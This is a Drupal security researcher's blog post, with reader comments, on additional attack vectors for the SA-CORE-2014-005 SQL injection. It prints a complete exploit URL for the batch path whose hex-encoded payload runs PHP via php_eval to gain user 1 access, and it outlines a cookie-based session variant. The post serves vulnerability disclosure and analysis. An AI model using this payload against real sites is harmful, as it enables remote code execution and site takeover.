Heine

  • Home
  • Drupal
  • About
Home

Other vectors for SA-CORE-2014-005?

Heine —Fri, 2014/10/31 - 21:57

This is intended a comment on Acquia's Learning from hackers a week after the Drupal SQL Injection announcement, but mollom prevents me from posting it there. In it, scor asks:

An open question is whether the SQL injection vulnerability was exploitable via some vector other than via the user login form.

Absolutely! Paths accessible to anonymous users that take user data to a query are all vulnerable. POSTs to the login form are not necessary. Examples:

System batch processing

The path to the batch system is accessible to anonymous users, because the page does access checks after doing a SQL query. This SQL query accepts an id from the request. Either GET or POST works. Depending on your PHP configuration, even COOKIE can be used.

http://domain/batch?id[1+AND+token%3D%27foo%27+UNION+SELECT+X%27613a31323a7b733a343a2273657473223b613a313a7b693a303b613a31343a7b733a373a2273616e64626f78223b613a303a7b7d733a373a22726573756c7473223b613a303a7b7d733a373a2273756363657373223b623a303b733a353a227374617274223b693a303b733a373a22656c6170736564223b693a303b733a31313a2270726f6772657373697665223b623a313b733a353a227469746c65223b733a31303a2250726f63657373696e67223b733a31323a22696e69745f6d657373616765223b733a32343a22496e697469616c697a696e672e3c62722f3e266e6273703b223b733a31363a2270726f67726573735f6d657373616765223b733a32393a22436f6d706c65746564204063757272656e74206f662040746f74616c2e223b733a31333a226572726f725f6d657373616765223b733a32323a22416e206572726f7220686173206f636375727265642e223b733a333a22637373223b613a303a7b7d733a353a22746f74616c223b693a323b733a353a22636f756e74223b693a323b733a353a227175657565223b613a323a7b733a343a226e616d65223b733a32313a2264727570616c5f62617463683a3434373836333a30223b733a353a22636c617373223b733a31303a2242617463685175657565223b7d7d7d733a31363a226861735f666f726d5f7375626d697473223b623a303b733a31313a2263757272656e745f736574223b693a303b733a31313a2270726f6772657373697665223b623a313b733a333a2275726c223b733a373a227768617465763b223b733a31313a2275726c5f6f7074696f6e73223b613a303a7b7d733a31303a22736f757263655f75726c223b733a34313a223c3f70687020676c6f62616c2024757365723b202475736572203d20757365725f6c6f61642831293b223b733a383a227265646972656374223b623a303b733a353a227468656d65223b733a363a2262617274696b223b733a31373a2272656469726563745f63616c6c6261636b223b733a383a227068705f6576616c223b733a323a226964223b733a363a22343437383633223b733a31333a226572726f725f6d657373616765223b733a37363a22506c6561736520636f6e74696e756520746f203c6120687265663d222f323f69643d34343738363326616d703b6f703d66696e6973686564223e746865206572726f7220706167653c2f613e223b7d%27+--+]=&id[1]&op=finished

If one prefers, and is able to upload files to the site, a slightly modified query is able to cause this file to be executed. Alternatively, one could try to piggyback on the unserialize and execute a destructor.

Session handling code (COOKIE)

The default session handling code stores information in the database. It has to query on session values to obtain stored session information.

If the site uses HTTPS, a value from $_COOKIE is used in such a query. This value can be used to conduct a SQL injection attack. An exploit could result in uid 1 access to the site, possibly _without_ even having to insert a session into the db.

I haven't seen these, nor use of other potential avenues in the wild, but then again, I can only observe a small number of sites.

  • Drupal
  • Security

Comments

Thanks Heine for your

Submitted by scor (not verified) on Sat, 2014/11/01 - 01:22

Thanks Heine for your research, and sorry about the Mollom trouble. On the bright side, I think your comment was well worth a blog post of its own! I've posted a link to this blog post from my blog post on acquia.com.

It's not clear in your post whether you have seen those vectors being exploited in the wild. I'd be curious to know if you or anyone else has seen them for real exploits.

Thank you. I have not seen

Submitted by Heine on Sat, 2014/11/01 - 07:22

Thank you. I have not seen these and other avenues used in the wild atm. I've updated the post to say so.

There had been a proof of

Submitted by Fabianx (not verified) on Sun, 2014/11/02 - 01:09

There had been a proof of concept code in the wild directly logging a user in as uid 1, but I don't remember if it used $_COOKIE.

Recent posts

  • Other vectors for SA-CORE-2014-005?
  • Lazy loading: hook_hook_info is for hook owners only.
  • "Always offline" problem in EA's Origin due to antivirus
  • From bug to exploit - Bakery SSO
  • Solving getting bogus dates via MSSQL_QUERY
more

Security reviews

I provide security reviews of custom code, contributed modules, themes and entire sites via LimoenGroen.

Contact us for a quote.

Follow @Ustima

Copyright © 2016 by Heine Deelstra. All rights reserved.

  • Home
  • Drupal
  • About